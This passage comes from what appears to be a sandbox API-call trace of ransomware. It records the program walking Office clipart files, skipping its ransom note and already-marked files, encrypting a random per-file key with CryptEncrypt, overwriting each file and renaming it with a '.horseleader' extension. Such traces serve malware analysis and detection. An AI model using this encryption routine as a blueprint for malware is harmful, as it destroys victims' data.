lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xea2, lpOverlapped=0x0) returned 1 [0252.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.756] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.757] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.757] CloseHandle (hObject=0x158) returned 1 [0252.757] GetProcessHeap () returned 0x780000 [0252.757] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.757] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.horseleader") returned 79 [0252.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.horseleader")) returned 1 [0252.758] GetProcessHeap () returned 0x780000 [0252.758] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.758] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8335e700, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8335e700, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x16cc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01216_.WMF", cAlternateFileName="")) returned 1 [0252.758] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="Windows") returned -1 [0252.759] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 67 [0252.759] StrStrIW (lpFirst="AN01216_.WMF", lpSrch=".horseleader") returned 0x0 [0252.759] lstrcmpW (lpString1="AN01216_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.759] lstrcmpW (lpString1="AN01216_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.759] lstrlenW (lpString=".testttjffg") returned 11 [0252.759] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.759] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.759] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.760] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 67 [0252.760] StrStrW (lpFirst="AN01216_.WMF", lpSrch=".txt") returned 0x0 [0252.760] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5836) returned 1 [0252.760] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x16cc, lpOverlapped=0x0) returned 1 [0252.765] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe934, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.765] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x16cc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x16cc, lpOverlapped=0x0) returned 1 [0252.765] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.765] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.766] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.766] CloseHandle (hObject=0x158) returned 1 [0252.766] GetProcessHeap () returned 0x780000 [0252.766] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.766] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.horseleader") returned 79 [0252.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.horseleader")) returned 1 [0252.768] GetProcessHeap () returned 0x780000 [0252.768] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.768] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fa26000, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7fa26000, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01218_.WMF", cAlternateFileName="")) returned 1 [0252.768] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="Windows") returned -1 [0252.768] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 67 [0252.768] StrStrIW (lpFirst="AN01218_.WMF", lpSrch=".horseleader") returned 0x0 [0252.768] lstrcmpW (lpString1="AN01218_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.768] lstrcmpW (lpString1="AN01218_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.769] lstrlenW (lpString=".testttjffg") returned 11 [0252.769] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.769] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.769] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 67 [0252.770] StrStrW (lpFirst="AN01218_.WMF", lpSrch=".txt") returned 0x0 [0252.770] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3012) returned 1 [0252.770] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xbc4, lpOverlapped=0x0) returned 1 [0252.773] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff43c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.773] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xbc4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xbc4, lpOverlapped=0x0) returned 1 [0252.774] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.774] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.774] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.774] CloseHandle (hObject=0x158) returned 1 [0252.774] GetProcessHeap () returned 0x780000 [0252.774] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.774] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.horseleader") returned 79 [0252.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.horseleader")) returned 1 [0252.776] GetProcessHeap () returned 0x780000 [0252.776] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.776] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68bb3800, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x68bb3800, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0xac4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01251_.WMF", cAlternateFileName="")) returned 1 [0252.776] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="Windows") returned -1 [0252.776] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 67 [0252.776] StrStrIW (lpFirst="AN01251_.WMF", lpSrch=".horseleader") returned 0x0 [0252.776] lstrcmpW (lpString1="AN01251_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.776] lstrcmpW (lpString1="AN01251_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.776] lstrlenW (lpString=".testttjffg") returned 11 [0252.776] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.776] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.776] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.778] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 67 [0252.778] StrStrW (lpFirst="AN01251_.WMF", lpSrch=".txt") returned 0x0 [0252.778] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2756) returned 1 [0252.778] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xac4, lpOverlapped=0x0) returned 1 [0252.780] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff53c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.780] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xac4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xac4, lpOverlapped=0x0) returned 1 [0252.780] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.780] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.781] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.781] CloseHandle (hObject=0x158) returned 1 [0252.781] GetProcessHeap () returned 0x780000 [0252.781] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.781] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.horseleader") returned 79 [0252.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.horseleader")) returned 1 [0252.782] GetProcessHeap () returned 0x780000 [0252.783] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.783] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc436f700, ftCreationTime.dwHighDateTime=0x1bd4b08, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc436f700, ftLastWriteTime.dwHighDateTime=0x1bd4b08, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01545_.WMF", cAlternateFileName="")) returned 1 [0252.783] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="Windows") returned -1 [0252.783] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 67 [0252.783] StrStrIW (lpFirst="AN01545_.WMF", lpSrch=".horseleader") returned 0x0 [0252.783] lstrcmpW (lpString1="AN01545_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.783] lstrcmpW (lpString1="AN01545_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.783] lstrlenW (lpString=".testttjffg") returned 11 [0252.783] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.783] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.783] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.784] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 67 [0252.784] StrStrW (lpFirst="AN01545_.WMF", lpSrch=".txt") returned 0x0 [0252.784] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7372) returned 1 [0252.784] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1ccc, lpOverlapped=0x0) returned 1 [0252.789] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe334, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.789] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1ccc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1ccc, lpOverlapped=0x0) returned 1 [0252.789] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.789] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.790] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.790] CloseHandle (hObject=0x158) returned 1 [0252.790] GetProcessHeap () returned 0x780000 [0252.790] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.790] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.horseleader") returned 79 [0252.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf.horseleader")) returned 1 [0252.791] GetProcessHeap () returned 0x780000 [0252.791] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.791] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37a5800, ftCreationTime.dwHighDateTime=0x1bd4af9, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe37a5800, ftLastWriteTime.dwHighDateTime=0x1bd4af9, nFileSizeHigh=0x0, nFileSizeLow=0x1d74, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN02122_.WMF", cAlternateFileName="")) returned 1 [0252.792] lstrcmpiW (lpString1="AN02122_.WMF", lpString2="Windows") returned -1 [0252.792] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 67 [0252.792] StrStrIW (lpFirst="AN02122_.WMF", lpSrch=".horseleader") returned 0x0 [0252.792] lstrcmpW (lpString1="AN02122_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.792] lstrcmpW (lpString1="AN02122_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.792] lstrlenW (lpString=".testttjffg") returned 11 [0252.792] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.792] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.792] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.793] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF") returned 67 [0252.793] StrStrW (lpFirst="AN02122_.WMF", lpSrch=".txt") returned 0x0 [0252.793] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7540) returned 1 [0252.794] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1d74, lpOverlapped=0x0) returned 1 [0252.795] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe28c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.796] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1d74, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1d74, lpOverlapped=0x0) returned 1 [0252.796] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.796] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.796] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.796] CloseHandle (hObject=0x158) returned 1 [0252.796] GetProcessHeap () returned 0x780000 [0252.797] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.797] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.horseleader") returned 79 [0252.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02122_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an02122_.wmf.horseleader")) returned 1 [0252.797] GetProcessHeap () returned 0x780000 [0252.797] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.798] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcec9bd00, ftCreationTime.dwHighDateTime=0x1bd4bea, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcec9bd00, ftLastWriteTime.dwHighDateTime=0x1bd4bea, nFileSizeHigh=0x0, nFileSizeLow=0x19e8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN02559_.WMF", cAlternateFileName="")) returned 1 [0252.798] lstrcmpiW (lpString1="AN02559_.WMF", lpString2="Windows") returned -1 [0252.798] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN02559_.WMF") returned 67 [0252.798] StrStrIW (lpFirst="AN02559_.WMF", lpSrch=".horseleader") returned 